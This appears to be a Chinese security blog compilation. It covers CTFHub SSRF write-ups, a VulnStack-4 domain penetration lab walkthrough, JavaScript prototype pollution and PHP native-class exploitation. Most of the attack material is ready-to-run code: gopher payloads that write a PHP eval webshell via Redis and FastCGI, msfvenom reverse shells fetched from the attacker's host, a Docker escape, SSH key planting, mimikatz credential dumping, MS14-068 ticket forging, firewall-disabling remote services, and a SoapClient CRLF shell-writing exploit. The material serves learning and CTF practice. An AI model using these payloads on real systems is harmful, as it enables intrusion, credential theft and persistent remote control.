gopher%3A//127.0.0.1%3A9000/_%2501%2501%2595%2594%2500%2508%2500%2500%2500%2501%2500%2500%2500%2500%2500%2500%2501%2504%2595%2594%2501%25DB%2500%2500%2511%250BGATEWAY_INTERFACEFastCGI/1.0%250E%2504REQUEST_METHODPOST%250F%2517SCRIPT_FILENAME/var/www/html/index.php%250B%2517SCRIPT_NAME/var/www/html/index.php%250C%2500QUERY_STRING%250B%2517REQUEST_URI/var/www/html/index.php%250D%2501DOCUMENT_ROOT/%250F%250ESERVER_SOFTWAREphp/fcgiclient%250B%2509REMOTE_ADDR127.0.0.1%250B%2504REMOTE_PORT9985%250B%2509SERVER_ADDR127.0.0.1%250B%2502SERVER_PORT80%250B%2509SERVER_NAMElocalhost%250F%2508SERVER_PROTOCOLHTTP/1.1%250C%2510CONTENT_TYPEapplication/text%250E%2502CONTENT_LENGTH69%2509%251FPHP_VALUEauto_prepend_file%2520%253D%2520php%253A//input%250F%2516PHP_ADMIN_VALUEallow_url_include%2520%253D%2520On%2501%2504%2595%2594%2500%2500%2500%2500%2501%2505%2595%2594%2500E%2500%2500%253C%253Fphp%2520system%2528%2527find%2520/%2520-name%2520%255C%2527%252A%255C%2527%2520%257C%2520xargs%2520grep%2520%255C%2527ctfhub%257B%255C%2527%2527%2529%253B%2520exit%253B%2520%253F%253E%2501%2505%2595%2594%2500%2500%2500%2500

Redis协议

题目提示这次来攻击redis协议吧.redis://127.0.0.1:6379,资料?没有资料!自己找!

使用脚本生成payload，python2下跑

import urllib,requestsprotocol="gopher://"ip="127.0.0.1"port="6379"shell="\n\n\n\n"filename="shell.php"path="/var/www/html"passwd=""cmd=["flushall",     "set 1 {}".format(shell.replace(" ","${IFS}")),     "config set dir {}".format(path),     "config set dbfilename {}".format(filename),     "save"     ]if passwd:    cmd.insert(0,"AUTH {}".format(passwd))payload=protocol+ip+":"+port+"/_"def redis_format(arr):    CRLF="\r\n"    redis_arr = arr.split(" ")    cmd=""    cmd+="*"+str(len(redis_arr))    for x in redis_arr:        cmd+=CRLF+"$"+str(len((x.replace("${IFS}"," "))))+CRLF+x.replace("${IFS}"," ")    cmd+=CRLF    return cmdif __name__=="__main__":    for x in cmd:        payload += urllib.quote(redis_format(x))    result = urllib.quote(payload)    print result

gopher%3A//127.0.0.1%3A6379/_%252A1%250D%250A%25248%250D%250Aflushall%250D%250A%252A3%250D%250A%25243%250D%250Aset%250D%250A%25241%250D%250A1%250D%250A%252434%250D%250A%250A%250A%253C%253Fphp%2520eval%2528%2524_POST%255B%2522shell%2522%255D%2529%253B%253F%253E%250A%250A%250D%250A%252A4%250D%250A%25246%250D%250Aconfig%250D%250A%25243%250D%250Aset%250D%250A%25243%250D%250Adir%250D%250A%252413%250D%250A/var/www/html%250D%250A%252A4%250D%250A%25246%250D%250Aconfig%250D%250A%25243%250D%250Aset%250D%250A%252410%250D%250Adbfilename%250D%250A%25249%250D%250Ashell.php%250D%250A%252A1%250D%250A%25244%250D%250Asave%250D%250A

将生成的结果直接传给url，访问

然后访问shell.php

可以看到成功写入，然后找flag，直接cat即可

URL Bypass

题目提示请求的URL中必须包含http://notfound.ctfhub.com，来尝试利用URL的一些特殊地方绕过这个限制吧

可以用@绕过，http://whoami@127.0.0.1实际上是以用户名 whoami 连接到站点127.0.0.1

payload

?url=http://notfound.ctfhub.com@127.0.0.1/flag.php

数字IP Bypass

题目提示这次ban掉了127以及172.不能使用点分十进制的IP了。但是又要访问127.0.0.1。该怎么办呢

可以用十进制绕过，当然也可以是用八进制或者十六进制，但是都需要用到.

?url=http://2130706433/flag.php

另外还有一种思路，利用其他各种指向127.0.0.1的地址，学习了

http://localhost/http://0/http://[0:0:0:0:0:ffff:127.0.0.1]/http://①②⑦.⓪.⓪.①

302跳转 Bypass

题目提示SSRF中有个很重要的一点是请求可能会跟随302跳转，尝试利用这个来绕过对IP的检测访问到位于127.0.0.1的flag.php吧

还是上面一样的方法直接绕了

另外还有一种方法，用短链接，http://4m.cn

DNS重绑定 Bypass

题目提示关键词：DNS重绑定。剩下的自己来吧，也许附件中的链接能有些帮助

附件给的链接：https://zhuanlan.zhihu.com/p/89426041

理解后实践

我们在 https://lock.cmpxchg8b.com/rebinder.html 这个网站上获取一个测试用的域名，当然这个网站目的就是用来测DNS重绑定漏洞的，拿到生成的域名7f000001.2f6aa0b0.rbndr.us

请求，如果是404就按F5刷新

参考

VulnStack-4靶场练习

2021-07-06T12:00:00.000Z

本文全程参考记一次Vulnstack靶场内网渗透（二）来复现渗透过程，目的在于学习渗透流程和基本思路，记录下学习笔记

环境搭建

靶机地址：http://vulnstack.qiyuanxuetang.net/vuln/detail/6/

学习思路：st漏洞利用、phpmyadmin getshell、tomcat 漏洞利用、docker逃逸、ms14-068、ssh密钥利用、流量转发、历史命令信息泄露、域渗透

攻击机Kali (192.168.0.106)

虚拟网卡配置

Ubuntu web服务器网卡配置，配两张网卡（192.168.0.105，192.168.183.128）

DC Windows Server 2008 R2服务器网卡配置（192.168.183.130）

Windows 7网卡配置（192.168.183.129）

然后把docker容器都开起来，靶机里有vulhub，直接拉就行了，这里拉三个

cd /home/ubuntu/Desktop/vulhub/struts/s2-045docker-compose up -dcd ../../tomcat/CVE-2017-12615docker-compose up -dcd ../../phpmyadmin/CVE-2018-12613docker-compose up -d

分别对应

s2-045
CVE-2017-12615(tomcat put上传)
CVE-2018-12613(phpmyadmin文件包含漏洞)

docker开启情况如下

初始密码

f服务器：ubuntu->ubuntu
域成员Win7：douser->Dotest123
域控DC：administrator->Test2008

靶机环境拓扑（ip地址在文中可能变化）

目标：

域控中存在一份重要文件——《漂亮国网络攻击授权报告》。

信息搜集

nmap信息搜集

nmap -T4 -A -sN 192.168.0.105

有ssh，struts2，tomcat，phpmyadmin等服务

Web渗透

struts2渗透

直接上工具扫一下，工具地址：https://github.com/zhzyker/vulmap

存在s2-045，RCE

phpmyadmin渗透

看到phpmyadmin版本为4.8.1，想到文件包含漏洞（CVE-2018-12613）

searchsploit phpmyadmin 4.8.1

测试payload：

http://192.168.0.105:2003/index.php?target=db_sql.php%253f/../../../../../etc/passwd

利用session文件包含，查询一条sql语句，file_put_contents写文件

SELECT '

cookie中phpMyAdmin的值为d70bbb50bbcc99dde55870cf69eda13b

访问http://192.168.0.105:2003/index.php?target=db_sql.php%3f../../../../../../../tmp/sess_d70bbb50bbcc99dde55870cf69eda13b，把shell写进去

随后蚁剑连接

成功连接

tomcat渗透

searchsploit tomcat 8.5.19

由nmap扫描信息可知，2002端口的Tomcat版本为8.5.19，search一下发现有洞

用第一个脚本进行exploit

成功拿到root权限

利用漏洞原理传个shell，好执行命令

<%@ page import="java.util.*,java.io.*,java.net.*"%><%%></FORM><%if (request.getParameter("cmd") != null) {    out.println("Command: " + request.getParameter("cmd") + "\n</pre></BODY></HTML>
Docker主机逃逸
msf弹shell
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.0.106 LPORT=4444 -f elf > shell.elf
生成一个msf马shell.elf
在本地用python开一个http服务
python3 -m http.server
下载shell并给权限
wget http://192.168.0.106:8000/shell.elfchmod 777 shell.elf
kali机开启监听
msfconsoleuse exploit/multi/handlerset PAYLOAD linux/x86/meterpreter/reverse_tcpset LHOST 192.168.183.1show optionsrun
随后靶机上执行./shell.elf，msf即可成功获得会话
利用CVE-2019-5736逃逸
在Docker 18.09.2之前的版本中使用的runc版本小于1.0-rc6，因此允许攻击者重写宿主机上的runc 二进制文件，攻击者可以在宿主机上以root身份执行命令。
平台或产品 受影响版本 Docker Version < 18.09.2 runC Version <= 1.0-rc6
恶意容器需满足以下两个条件之一：
由一个攻击者控制的恶意镜像创建
攻击者具有某已存在容器的写权限，且可通过docker exec进入。
Poc地址：https://github.com/Frichetten/CVE-2019-5736-PoC
是一个go写的脚本，需要自己下载编译
先装go环境
cd /usr/localwget https://studygolang.com/dl/golang/go1.16.5.linux-amd64.tar.gztar -xzf go1.16.5.linux-amd64.tar.gzvim /etc/profile添加 export PATH=$PATH:/usr/local/go/binsource /etc/profilego version
出现版本号即安装成功
编译生成payload
CGO_ENABLED=0 GOOS=linux GOARCH=amd64 go build main.go
用msf会话将编译得到的main文件上传到docker容器的/home目录中，并赋权
upload /home/kali/CVE-2019-5736-PoC/main /home
在kali机上监听
nc -lvp 4444
到靶机上执行./main
此时，只需等待目标机管理员重启该docker容器，payload就会触发，如下图，我们手动模拟docker重启：
sudo docker exec -it 09dd4e5bfa91 /bin/bash
显示payload执行成功
但是并未收到shell
利用--privileged特权模式逃逸
特权模式于版本0.6时被引入Docker，允许容器内的root拥有外部物理机root权限，而此前容器内root用户仅拥有外部物理机普通用户权限。
使用特权模式启动容器，可以获取大量设备文件访问权限。因为当管理员执行docker run —privileged时，Docker容器将被允许访问主机上的所有设备，并可以执行mount命令进行挂载。
当控制使用特权模式启动的容器时，docker管理员可通过mount命令将外部宿主机磁盘设备挂载进容器内部，获取对整个宿主机的文件读写权限，此外还可以通过写入计划任务等方式在宿主机执行命令。
具体可参考：配置不当导致的容器逃逸
学习路线中有一个ssh密钥利用，推测是利用docker的特权模式来在宿主机硬盘中写入ssh私钥，实现ssh免密登录宿主机，从而实现对目标宿主机的控制
mkdir /hackls /dev...sdasda1sda2sda5...
尝试将/dev/sda1挂载到/hack目录里mount /dev/sda1 /hack，ls /hack查看，挂载成功
在docker容器里挂载一个宿主的本地目录，这样某些容器里输出的文件，就可以在本地目录中打开访问了。
将sda1挂载成功，我们就可以通过访问容器内部的/hack路径来达到访问整个宿主机的目的，比如我们访问/hack/home目录也就是访问宿主机的/home目录
本地生成ssh秘钥
ssh-keygen -f hackchmod 600 hack    // 不要忘记对秘钥文件赋600权限，否则不能执行
我们要将ssh秘钥写入到.ssh目录里面并将文件命名为authorized_keys（目标机.ssh目录权限必须为700）。
cp -avx /hack/home/ubuntu/.ssh/id_rsa.pub /hack/home/ubuntu/.ssh/authorized_keys    # -avx是将权限也一起复制echo 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCg9LpD/MuFWzIzUQB4RQCFa8Avljlla4Z0iuk3jMQVxrxcDjOhoaLmXmbS63/crPQ15s1oEzNpi2L0MtU/ZMbDFHpKVJGSwNbZeMzEnYsOMd1x4r6BojP4bN4d2okv4sYVSCgWiNUQBHWQcUcnf3rkFw309maxSIwiNNl1C6jzwCNjo3rWA9YV8869N7q/oZtPob3M5yVT77nYMOdO4mnU/A8dbr8KkmcjoVZclK1aAnu96XJywWmArtfZjF9FdlqUkB9ZhknnpxHqP1/sH5lNk/S/pOQTq94VpU4YdK4aBt5mFj16okbudhNKGOBBlNFECcQIU/11djNDYD+FqVn7H/rKuYa7LOJkNhgXv/Q7tBIuoJBrWKqFSQPxUdiTDzeuWhWVw5Kjzf3sEoTOHqO7oUD23iQHnoO1ZwxJp/CnDRSTyCcxTcUwheM+JTSEXembyDtQWPmt3g24UNish8s3INTPT2Abd1q2mspwuSKWHuZo8yIrNq5mfS8lvkhT1rc= kali@kali' > /hack/home/ubuntu/.ssh/authorized_keys    # 将ssh秘钥写入authorized_keys文件
如果上面echo不进去可以直接在msf中上传
此时，攻击者就可以利用自己的私钥进行免密登陆目标宿主机了
ssh -i hack ubuntu@192.168.0.105  (图后面加的,IP地址变了)
内网渗透
内网探测添加路由
我们已经拿到ubuntu这台服务器，重新弹个meterpreter过来
kali机重新开启一个Web服务：python3 -m http.server
msf上监听端口
set AutoRunScript migrate -f  (自动迁移进程,防止用户删除木马,丢失目标)
在ubuntu上执行
wget http://192.168.0.106:8000/shell.elfchmod 777 shell.elf./shell.elf
msf传一个ew上去upload /home/kali/ew_for_linux64 /home/ubuntu
ifconfig查看Ubuntu上的内网
发现存在（192.168.183.1/24）这个内网
于是我们在ubuntu上开启socks5正向代理
ew下链接：https://github.com/idlefire/ew
chmod 777 ew_for_linux64./ew_for_linux64 -s ssocksd -l 1080 
此时，kali上的应用程序就可以通过proxychains代理进目标内网了vim /etc/proxychains4.conf
探测内网存活的主机，因为使用的是socks的代理，只能使用tcp协议，所以nmap使用的时候要使用-sT选择使用tcp协议，要使用-Pn不使用ICMP的ping确认主机存活
proxychains4 nmap -sT -sV -Pn -n -p22,445 192.168.183.0/24
经过扫描可以得知目标内网中还有192.168.183.129（Win7）和192.168.183.130（DC）这两台主机。并且都开了445端口
在msf添加内网路由，这里直接在msf中run autoroute会报错
具体参考：https://www.jason-w.cn/pentest/2021/02/28/242.html
backgrounduse post/multi/manage/autorouteshow optionsset SESSION 7set SUBNET 192.168.183.0show optionsexploitroute
exploit后查看route路由
ms17_010利用
扫描目标内网中可能存在ms17_010永恒之蓝漏洞的主机
use auxiliary/scanner/smb/smb_ms17_010 set RHOSTS 192.168.183.128-130run
先打Windows7这台
我们使用chisel代理工具来进行内网渗透连接，下载链接：https://github.com/jpillora/chisel
具体使用方法可以看：https://www.anquanke.com/post/id/234771
为什么不用原来的ew，因为用ew不稳定，ms17_011打不通（本人亲测打不通）
Ubuntu上执行./chisel server -p 2333 --socks5
Kali机上进行连接./chisel client 192.168.0.107:2333 1080:socks
反向代理，这样我们kali机上的1080端口就可以访问内网里的主机了
然后用msf打
setg Proxies socks5:127.0.0.1:1080       // 设置代理，不设置代理ms17_010很难打通use exploit/windows/smb/ms17_010_eternalblueset payload windows/x64/meterpreter/bind_tcpset RHOST 192.168.183.129set LHOST 192.168.0.106set LPORT 4444set AutoRunScript post/windows/manage/migrate             // 自动迁移进程run
一次打通
内网信息搜集
sysinfo                #查看主机信息getuid                 #查看当前tokenuse incognito          #加载incognito，（用来盗窃目标主机的令牌或是假冒用户)list_tokens -u         #列出目标主机用户的可用令牌impersonate_token "DEMO\douser" #模拟DEMO\douser用户rev2self               #返回到之前的AccessToken权限
execute -f cmd.exe -i       # 交互式运行cmdexecute -f cmd.exe -i -t    # 使用可用token 运行execute -f cmd.exe -i -H -t # 同上，同时隐藏进程# 可以直接shellchcp 65001      # 简单解决一下乱码ipconfig /all   # 查看本机ip，所在域route print     # 打印路由信息net view        # 查看局域网内其他主机名arp -a          # 查看arp缓存whoaminet start       # 查看开启了哪些服务net share       # 查看开启了哪些共享net share ipc$  # 开启ipc共享net share c$    # 开启c盘共享net use \\192.168.xx.xx\ipc$ "" /user:""   # 与192.168.xx.xx建立空连接net use \\192.168.xx.xx\c$ "密码" /user:"用户名"  # 建立c盘共享dir \\192.168.xx.xx\c$\user    # 查看192.168.xx.xx c盘user目录下的文件# 以下命令需要切换到域用户douser执行net config Workstation   # 查看计算机名、全名、用户名、系统版本、工作站、域、登录域net user                 # 查看本机用户列表net user /domain         # 查看域用户net localgroup administrators   # 查看本地管理员组（通常会有域用户）net view /domain         # 查看有几个域net user 用户名 /domain   # 获取指定域用户的信息net group /domain        # 查看域里面的工作组，查看把用户分了多少组（只能在域控上操作）net group 组名 /domain    # 查看域中某工作组net group "domain admins" /domain  # 查看域管理员的名字net group "domain computers" /domain  # 查看域中的其他主机名net group "doamin controllers" /domain  # 查看域控制器（可能有多台）
由搜集到的信息，我们知道目标win7在demo.com域中，域控为WIN-ENS2VR5TR3N，域管理员为Administrator，ping查看域控ip
在目标机上传mimikatz，抓一下Windows 7的密码，mimikatz要有管理员权限不然无法抓取内存密码，要先模拟个system的令牌才能执行成功
impersonate_token "NT AUTHORITY\SYSTEM"shellmimikatz.exeprivilege::debug         # 权限提升sekurlsa::logonpasswords # 抓取密码
得到明文密码为Dotest123，接下来可以进行横向移动攻击域控
尝试用ms17_010打域控机
利用失败
ms14-068利用
漏洞利用前提
域控没有打MS14-068的补丁(KB3011780)
拿下一台加入域的计算机
有这台域内计算机的域用户密码和sid
使用ms14-068，下载地址：https://github.com/abatchy17/WindowsExploits/tree/master/MS14-068
upload /home/kali/Desktop/WindowsExploits/MS14-068/MS14-068.exe c:\\users\\douser
在win7上执行下面一条命令
域成员sid在上面mimikatz中获取到了，当然也可以用whoami /user 获取sid
ms14-068.exe -u douser@DEMO.com -s S-1-5-21-979886063-1111900045-1414766810-1107 -d 192.168.183.130 -p Dotest123// ms14-068.exe -u 域成员名@域名.com -s 域成员sid -d 域控制器ip地址 -p 域成员密码
成功生成票据文件
c:\windows\system32\mimikatz.exekerberos::purge               # 清空当前机器中所有凭证，如果有域成员凭证会影响凭证伪造kerberos::list                # 查看当前机器凭证kerberos::ptc TGT_douser@DEMO.com.ccache(生成的票据文件)   # 将票据注入到内存中
尝试net use登录域控
net use \\WIN-ENS2VR5TR3Ndir \\WIN-ENS2VR5TR3N\c$
如上图，成功登录域控并列出了域控的c盘目录。此时要想控制域控我们还要在Windows 7上面上传一个正向的msf马。
msfvenom -p windows/meterpreter/bind_tcp lhost=192.168.0.108 lport=4455 -f exe -o bind.exe
传到Windows7上，然后用smb文件共享将msf马copy到域控的C盘
upload /home/kali/Desktop/bind.exe
通过远程在域控上面设置好计划任务
schtasks /create /tn "test" /tr C:\windows\system32\bind.exe /sc MINUTE /S 192.168.183.130
显示Access is denied，用sc服务来远程执行，设置服务来关闭防火墙
sc \\WIN-ENS2VR5TR3N create unablefirewall binpath= "netsh advfirewall set allprofiles state off"sc \\WIN-ENS2VR5TR3N start unablefirewall
创建服务执行msf马（msf正在监听）
sc \\WIN-ENS2VR5TR3N create bindshell binpath= "c:\bind.exe"sc \\WIN-ENS2VR5TR3N start bindshell
msf配置
成功上线域控
上传mimikatz抓明文密码
upload /home/kali/Desktop/mimikatz.exe shellmimikatz.exeprivilege::debugsekurlsa::logonpasswords
拿到域管理员密码为Test2008@!
寻找敏感文件
拿下域控后，我们就要寻找开头说的那个域控中的重要文件了。开启域控的远程桌面
run post/windows/manage/enable_rdp
登录
proxychains4 rdesktop 192.168.183.130输入账号密码，账号：DEMO\Administrator 密码：Test2008@!
传个everything
安装后开启里面的http服务
kali浏览器走个代理，socks5的
随后即可访问服务器上的所有文件
至于啥漂亮国攻击授权报告，靶机上没有这文件，估计是自己加上去的，但目的已达成，开溜~

JavaScript原型链污染漏洞学习

2021-06-05T09:17:35.000Z

学点新东西，JavaScript独有的安全问题，JavaScript原型链污染，记笔记

原型链

搬张图，转自：https://www.zhihu.com/question/34183746

JavaScript 只有一种结构：对象。每个实例对象（ object ）都有一个私有属性（称之为 __proto__ ）指向它的构造函数的原型对象（prototype ）。该原型对象也有一个自己的原型对象( __proto__ ) ，层层向上直到一个对象的原型对象为 null。根据定义，null 没有原型，并作为这个原型链中的最后一个环节。

所有类对象在实例化的时候将会拥有prototype中的属性和方法，这个特性被用来实现JavaScript中的继承机制。

原型：原型是Javascript中继承的基础,Javascript的继承就是基于原型的继承
原型链：原型链是javascript的实现的形式,递归继承原型对象的原型,原型链的顶端是Object的原型。

proto

每个对象都有 __proto__ 属性，指向了创建该对象的构造函数的原型。其实这个属性指向了 [[prototype]]，但是 [[prototype]] 是内部属性，我们并不能访问到，所以使用 __proto__ 来访问。

prototype

每个函数都有 prototype 属性，除了 Function.prototype.bind()，该属性指向原型。所有的类对象在实例化的时候将会拥有prototype中的属性和方法

遵循ECMAScript标准，someObject.[[Prototype]] 符号是用于指向 someObject 的原型。从 ECMAScript 6 开始，[[Prototype]] 可以通过 Object.getPrototypeOf() 和 Object.setPrototypeOf() 访问器来访问。这个等同于 JavaScript 的非标准但许多浏览器实现的属性 __proto__。
但它不应该与构造函数 func 的 prototype 属性相混淆。被构造函数创建的实例对象的 [[Prototype]] 指向 func 的 prototype 属性。Object.prototype 属性表示 Object 的原型对象。

原型链继承

首先定义一个函数f

let f = function () {   this.a = 1;   this.b = 2;}// 这么写也一样function f() {  this.a = 1;  this.b = 2;}

我们从一个函数里创建一个对象o，它自身拥有属性a和b的

let o = new f(); // {a: 1, b: 2}

在f函数的原型上定义属性

f.prototype.b = 3;f.prototype.c = 4;

不要在 f 函数的原型上直接定义 f.prototype = {b:3,c:4};这样会直接打破原型链

o.[[Prototype]] 有属性 b 和 c， (其实就是 o.__proto__ 或者 o.constructor.prototype)

o.[[Prototype]].[[Prototype]] 是 Object.prototype

最后o.[[Prototype]].[[Prototype]].[[Prototype]]是null

这就是原型链的末尾，即 null，

根据定义，null 就是没有 [[Prototype]]。

综上，整个原型链如下:

{a:1, b:2} ---> {b:3, c:4} ---> Object.prototype---> null

a是o的自身属性吗？是的，该属性的值为 1

console.log(o.a); // 1

b是o的自身属性吗？是的，该属性的值为 2

原型上也有一个b属性，但是它不会被访问到。

这种情况被称为属性遮蔽 (property shadowing)

console.log(o.b); // 2

c是o的自身属性吗？不是，那看看它的原型上有没有

c是o.[[Prototype]]的属性吗？是的，该属性的值为 4

console.log(o.c); // 4

d 是 o 的自身属性吗？不是，那看看它的原型上有没有

d 是 o.[[Prototype]] 的属性吗？不是，那看看它的原型上有没有

o.[[Prototype]].[[Prototype]] 为 null，停止搜索

找不到 d 属性，返回 undefined

console.log(o.d); // undefined

调用对象属性时, 会查找属性，如果本身没有，则会去__proto__中查找，也就是构造函数的显式原型中查找，如果构造函数中也没有该属性，因为构造函数也是对象，也有__proto__，那么会去__proto__的显式原型中查找，一直到null

原型链污染

这里采用P🐮的例子来简单分析一下

// foo是一个简单的JavaScript对象let foo = {bar: 1}// foo.bar 此时为1console.log(foo.bar)// 修改foo的原型（即Object）foo.__proto__.bar = 2// 由于查找顺序的原因，foo.bar仍然是1console.log(foo.bar)// 此时再用Object创建一个空的zoo对象let zoo = {}// 查看zoo.barconsole.log(zoo.bar)

根据结果我们可以看到，zoo.bar打印出来的是2，foo是一个object实例，我们令foo.__proto__.bar = 2所以实际上是修改了Object这个类，增加了一个属性bar值为2，然后我们有创建了一个object类zoo，则zoo对象自然有一个bar属性

在一个应用中，如果攻击者控制并修改了一个对象的原型，那么将可以影响所有和这个对象来自同一个类、父祖类的对象。这种攻击方式就是原型链污染。

利用手段

常发生在merge 等对象递归合并操作
对象克隆
路径查找属性然后修改属性的时候

function merge(target, source) {    for (let key in source) {        if (key in source && key in target) {            merge(target[key], source[key])        } else {            target[key] = source[key]        }    }}let o1 = {}let o2 = JSON.parse('{"a": 1, "__proto__": {"b": 2}}')merge(o1, o2)console.log(o1.a, o1.b)  // 1,2o3 = {}console.log(o3.b)  // 2

这里为什么要用JSON.parse而不直接使用let o2 = {a: 1, "__proto__": {b: 2}}

如果不使用JSON.parse，则原型链并不会被污染，如下：

因为我们用JavaScript创建o2的过程（let o2 = {a: 1, "__proto__": {b: 2}}）中，__proto__已经代表o2的原型了，此时遍历o2的所有键名，拿到的是[a, b]，__proto__并不是一个key，自然也不会修改Object的原型。

栗子

CISCN2020 littlegame

2020年的国赛题，当时保存了一份题目源码，于是这里拿出来复现一下

index.js

var express = require('express');const setFn = require('set-value');var router = express.Router();const COMMODITY = {    "sword": {"Gold": "20", "Firepower": "50"},    // Times have changed    "gun": {"Gold": "100", "Firepower": "200"}}const MOBS = {    "Lv1": {"Firepower": "1", "Bounty": "1"},    "Lv2": {"Firepower": "5", "Bounty": "10"},    "Lv3": {"Firepower": "10", "Bounty": "15"},    "Lv4": {"Firepower": "20", "Bounty": "30"},    "Lv5": {"Firepower": "50", "Bounty": "65"},    "Lv6": {"Firepower": "80", "Bounty": "100"}}const BOSS = {    // Times have not changed    "Firepower": "201"}const Admin = {    "password1":process.env.p1,    "password2":process.env.p2,    "password3":process.env.p3}router.post('/BuyWeapon', function (req, res, next) {    // not implement    res.send("BOOS has said 'Times have not changed'!");});router.post('/EarnBounty', function (req, res, next) {    // not implement    res.send("BOOS has said 'Times have not changed'!");});router.post('/ChallengeBOSS', function (req, res, next) {    // not implement    res.send("BOOS has said 'Times have not changed'!");});router.post("/DeveloperControlPanel", function (req, res, next) {    // not implement    if (req.body.key === undefined || req.body.password === undefined){        res.send("What's your problem?");    }else {        let key = req.body.key.toString();        let password = req.body.password.toString();        if(Admin[key] === password){            res.send(process.env.flag);        }else {            res.send("Wrong password!Are you Admin?");        }    }});router.get('/SpawnPoint', function (req, res, next) {    req.session.knight = {        "HP": 1000,        "Gold": 10,        "Firepower": 10    }    res.send("Let's begin!");});router.post("/Privilege", function (req, res, next) {    // Why not ask witch for help?    if(req.session.knight === undefined){        res.redirect('/SpawnPoint');    }else{        if (req.body.NewAttributeKey === undefined || req.body.NewAttributeValue === undefined) {            res.send("What's your problem?");        }else {            let key = req.body.NewAttributeKey.toString();            let value = req.body.NewAttributeValue.toString();            setFn(req.session.knight, key, value);            res.send("Let's have a check!");        }    }});module.exports = router;

审计代码，flag在环境变量中，需要访问DeveloperControlPanel这个路由，并且需要Admin[key] === password，简单来说我们需要知道p1、p2、p3中的任意一个密码即可拿到flag

根据提示看到Privilege路由，这里访问时knight这个session没定义，则重定向到SpawnPoint创建一个，随后再访问的时候需要携带NewAttributeKey和NewAttributeValue两个参数，来进行setFn操作，可以看到setFn在头部定义const setFn = require('set-value');

set-value : Set nested properties on an object using dot notation. / 使用点表示法在对象上设置嵌套属性。

const set = require('set-value');const obj = {};set(obj, 'a.b.c', 'd');console.log(obj);//=> { a: { b: { c: 'd' } } }

跟进到这个包的源代码

'use strict';const isPlain = require('is-plain-object');function set(target, path, value, options) {  if (!isObject(target)) {    return target;  }  let opts = options || {};  const isArray = Array.isArray(path);  if (!isArray && typeof path !== 'string') {    return target;  }  let merge = opts.merge;  if (merge && typeof merge !== 'function') {    merge = Object.assign;  }  const keys = isArray ? path : split(path, opts);  const len = keys.length;  const orig = target;  if (!options && keys.length === 1) {    result(target, keys[0], value, merge);    return target;  }  for (let i = 0; i < len; i++) {    let prop = keys[i];    if (!isObject(target[prop])) {      target[prop] = {};    }    if (i === len - 1) {      result(target, prop, value, merge);      break;    }    target = target[prop];  }  return orig;}function result(target, path, value, merge) {  if (merge && isPlain(target[path]) && isPlain(value)) {    target[path] = merge({}, target[path], value);  } else {    target[path] = value;  }}

构造NewAttributeKey为__proto__.extrader，NewAttributeValue为extrader

path被拆分成['__proto__','extrader']，第一次的for循环，将target = target[prop]，此时的prop就是__proto__，经过一次循环后target就为req.session.knight.__proto__了，随后i === len - 1判断为最后一个值，进入result

主要看到result这个方法，会将value赋值给target[path],存在赋值操作,便出现了原型链污染

传入result函数的target为req.session.knight.__proto__，req.session.knight的原型是Object，即Object.prototype，我们就可以在Object这个类中定义变量req.session.knight.__proto__[path] = value，即Object.prototype[path] = value，键为path，值为value，value和path我们都可控

Exp：

import requestssession = requests.session()url = 'http://127.0.0.1:3000/'data1 = {    "NewAttributeKey" : "__proto__.extrader",    "NewAttributeValue" : "extrader"}data2 = {    "key" : "extrader",    "password" : "extrader"}session.get(url+'SpawnPoint')session.post(url+'Privilege', data=data1).textprint(session.post(url+'DeveloperControlPanel', data=data2).text)

参考

php原生类利用

2021-05-21T12:00:00.000Z

Class Found

php中含魔术方法的内置类

$classes = get_declared_classes();  // 返回由已定义类的名字所组成的数组foreach ($classes as $class) {    $methods = get_class_methods($class);  // 返回由类的方法名组成的数组    foreach ($methods as $method) {        if (in_array($method, array(            '__destruct',            '__toString',            '__wakeup',            '__call',            '__callStatic',            '__get',            '__set',            '__isset',            '__unset',            '__invoke',            '__set_state'        ))) {            print $class . '::' . $method . ";";        }    }    print "\n";}

SoapClient::__call

可进行SSRF

range：PHP 5, PHP 7, PHP 8

SOAP（简单对象访问协议）是连接或Web服务或客户端和Web服务之间的接口。
其采用HTTP作为底层通讯协议，XML作为数据传送的格式，仅限于http/https协议
SOAP消息基本上是从发送端到接收端的单向传输，但它们常常结合起来执行类似于请求 / 应答的模式。
如果想要使用SoapClient类需要在php.ini配置文件里面开启extension=php_soap.dll选项

SoapClient {    /* 方法 */    public __construct ( string|null $wsdl , array $options = [] )    public __call ( string $name , array $args ) : mixed    public __doRequest ( string $request , string $location , string $action , int $version , bool $oneWay = false ) : string|null    public __getCookies ( ) : array    public __getFunctions ( ) : array|null    public __getLastRequest ( ) : string|null    public __getLastRequestHeaders ( ) : string|null    public __getLastResponse ( ) : string|null    public __getLastResponseHeaders ( ) : string|null    public __getTypes ( ) : array|null    public __setCookie ( string $name , string|null $value = null ) : void    public __setLocation ( string $location = "" ) : string|null    public __setSoapHeaders ( SoapHeader|array|null $headers = null ) : bool    public __soapCall ( string $name , array $args , array|null $options = null , SoapHeader|array|null $inputHeaders = null , array &$outputHeaders = null ) : mixed}

use

SoapClient::__construct ( string|null $wsdl , array $options = [] )
- $wsdl：wsdl文件的uri，如果是NULL意味着不使用WSDL模式。
- $options：如果在wsdl模式下，此参数可选；如果在非wsdl模式下，则必须设置location和uri选项，其中location是要将请求发送到的SOAP服务器的URL，而uri 是SOAP服务的目标命名空间。
SoapClient::__call ( string $name , array $args ) : mixed

官方的$option参数中有这样的一条介绍

The user_agent option specifies string to use in User-Agent header.

我们可以自己设置User-Agent的值。当我们可以控制User-Agent的值时，也就意味着我们完全可以构造一个POST请求，因为Content-Type和Content-Length都在User-Agent之下，而控制这两个是利用CRLF发送POST请求最关键的地方。

Demo

$_SERVER['REMOTE_ADDR']参考

 if($_SERVER['REMOTE_ADDR']=='127.0.0.1'){    @$a=$_POST[1];    @eval($a);}

Exp

$target= 'http://127.0.0.1/demo.php';$post_string= '1=file_put_contents("shell.php", "");';$headers= array(   'X-Forwarded-For:127.0.0.1',   'Cookie:admin=1'   );$b= new SoapClient(null,array('location'=> $target,'user_agent'=>'wupco^^Content-Type:application/x-www-form-urlencoded^^'.join('^^',$headers).'^^Content-Length:'.(string)strlen($post_string).'^^^^'.$post_string,'uri'=>"xxx"));//因为User-agent是可以控制的，因此可以利用crlf注入http头部发送post请求$aaa= serialize($b);$aaa= str_replace('^^','%0d%0a',$aaa);$aaa= str_replace('&','%26',$aaa);echo $aaa;$x= unserialize(urldecode($aaa));//调用__call方法触发网络请求发送$x->no_func();

成功写shell

Error/Exception

XSS

range：Error(php7, PHP8), Exception(php5, php7, PHP8)

